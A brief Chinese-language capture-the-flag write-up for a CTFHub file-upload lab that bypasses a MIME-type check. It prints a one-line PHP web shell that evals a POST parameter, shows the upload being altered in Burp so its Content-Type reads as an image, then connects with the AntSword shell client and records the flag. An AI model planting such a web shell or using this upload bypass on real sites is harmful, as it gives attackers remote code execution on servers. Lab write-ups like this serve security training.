开启靶场,打开链接:
直接指明是MIME验证
新建04MIME.php文件,内容如下:
<?php echo "Ciallo~(∠・ω< )⌒★";@eval($_POST['pass']);?>
(这里加了点表情,加带点私货)
用burp抓包:
将application/octet-stream改成image/png或者jpg和gif符合条件就行:
之后再点击“forward”提交修改后的报文
木马文件上传成功
访问一下该文件,触发一下:
蚁剑连接:
成功得到flag:
ctfhub{8039866f66db23fc86ef1e42}